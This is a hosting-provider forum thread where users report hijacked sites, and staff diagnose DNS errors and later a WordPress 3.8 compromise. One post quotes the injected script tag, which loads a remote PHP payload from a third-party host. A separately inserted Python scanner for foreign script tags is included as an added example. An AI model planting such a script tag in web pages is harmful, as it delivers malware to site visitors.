My blog just got hacked

Status
Not open for further replies.

moviefa2

New Member
I wonder if this has happened to anybody else tonight. It just happened this evening; I was on it not 2 hours ago when it was a movie blog, and now it is a sporting goods site all of a sudden. Frankly I don't know what to do other than report this.

http://moviefan.pcriot.com/
 

Livewire

Abuse Compliance Officer
Staff member
I'm not sure what caused that but it doesn't look like a hack so much as something malfunctioning; the account itself wasn't modified, but an entry on our nameserver was incorrect and was pointing to the wrong IP (but only for this specific domain). I've re-saved the DNS settings and confirmed that it did update through OpenDNS, but depending on your DNS provider (usually your ISP) it may take some time for the change to propagate. You may be able to speed up the process by running "ipconfig /flushdns" in a Windows command prompt and then restarting the browser.
 

ohorosh211

New Member
Looks like the same issue with my kiwi.pcriot.com. Site IP changed, site content changed, but I can access cPanel. Please help!!!
 

Livewire

Abuse Compliance Officer
Staff member
Should be fixed as well, I've notified an admin that it's happening more than once so we can work on identifying exactly what's causing it.
 

moviefa2

New Member
Okay, now this is different; my site just goes to an empty folder like nothing is there. I logged into cPanel and checked and the files are there. Are you all working on the server or has the ip been redirected again?
 

leafypiggy

Manager of Pens and Office Supplies
Staff member
Hi moviefa2:

We're working on a permanent fix for this. I apologize for the downtime. :'( I'll update you when I have more info.
 

ohorosh211

New Member
Hi again, just for information - my kiwi.pcriot.com is also showing an empty folder now.
 

Livewire

Abuse Compliance Officer
Staff member
Fixed as above; we're still working on implementing the permanent fix so if it would change back, let us know and we'll keep repairing it until it's finally fixed fully :)
 

moviefa2

New Member
Mine is working fine too. I'll update you if that changes. Thank you for your help.
 

Livewire

Abuse Compliance Officer
Staff member
Should be fixed depending on how fast DNS propagates (see above).
 

ohorosh211

New Member
Again a problem with kiwi.pcriot.com. But this time it's different: the site is really hacked. The Firefox browser reported something like "This site may harm your computer" about my site. I checked the files and found that every html file is infected with the line
<script type="text/javascript" src="http://www.pentagonlondon.co.uk/wp-admin/6czhkn3x.php?id=15074425"></script>
All infected files have the modification time Sep 5, 2014 12:47 AM. I have closed the site with a password until the problem is resolved.
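A scan for the kind of injection described in the post above, as an added example that is not part of the original thread: it walks a web root, lists every HTML file carrying a script tag loaded from a host outside an allowlist, and records each file's modification time so a batch of files changed at the same moment stands out. The allowlist, the demo file names and the injected.example URL are constructed for illustration.

```python
import os
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

class ScriptSrcParser(HTMLParser):
    """Collects the src attribute of every <script> tag in a document."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)

def foreign_scripts(html, allowed_hosts):
    """Return script URLs whose host is not allowlisted (relative URLs pass)."""
    parser = ScriptSrcParser()
    parser.feed(html)
    hits = []
    for src in parser.sources:
        host = urlparse(src).hostname  # None for relative paths like /js/a.js
        if host and host.lower() not in allowed_hosts:
            hits.append(src)
    return hits

def scan_webroot(root, allowed_hosts):
    """Map each flagged .html/.htm file to (mtime, foreign script URLs)."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".html", ".htm")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = foreign_scripts(fh.read(), allowed_hosts)
            if hits:
                findings[os.path.relpath(path, root)] = (int(os.path.getmtime(path)), hits)
    return findings

def demo():
    """Build a constructed two-file web root (one clean, one injected) and scan it."""
    clean = '<html><body><script src="/js/site.js"></script></body></html>'
    bad = clean + '<script type="text/javascript" src="http://injected.example/x.php?id=1"></script>'
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("index.html", bad), ("about.html", clean)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_webroot(root, allowed_hosts={"kiwi.pcriot.com"})
```

Files that share one modification time and one foreign script URL, as in the post, point to a single automated write; files restored from backup should come back with an empty result.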
 

Livewire

Abuse Compliance Officer
Staff member
That particular compromise looks to have started from the demo_oleg/wp6 WordPress install, which is running version 3.8 and is 9 months out of date (3.8 launched last December). With compromises of this nature, you would be responsible for cleanup as account security is the user's responsibility, and if we attempt cleanup there's a very good chance we would actually damage the site further. With us only having full-server backups, we wouldn't be able to restore an individual website from them either, so if we were to make things worse by accident we wouldn't be able to fix it.

If you have backups, I would recommend removing everything on the account and starting from a backup that wasn't infected, then immediately updating all software to their latest versions. If no backups are available, then I would instead remove all files and start from fresh, vendor-supplied files that are up-to-date only, as any outdated software with known exploits is a target for hackers as soon as they discover the location of it.
 

ohorosh211

New Member
Thank you for your reply. Fortunately I have a backup and already restored the files from it. I removed the current WordPress installation, which is used only for part of the site, and will reinstall it later from scratch.
 

Livewire

Abuse Compliance Officer
Staff member
Should be fixed, same directions as above (need to wait for DNS to propagate, blah blah blah blah blah). Admins know what caused it and I believe we have a solution in place to help prevent it in the future (if not, I know they're working on it, 'cause I will nag them incessantly until they tell me it's done :) ).
 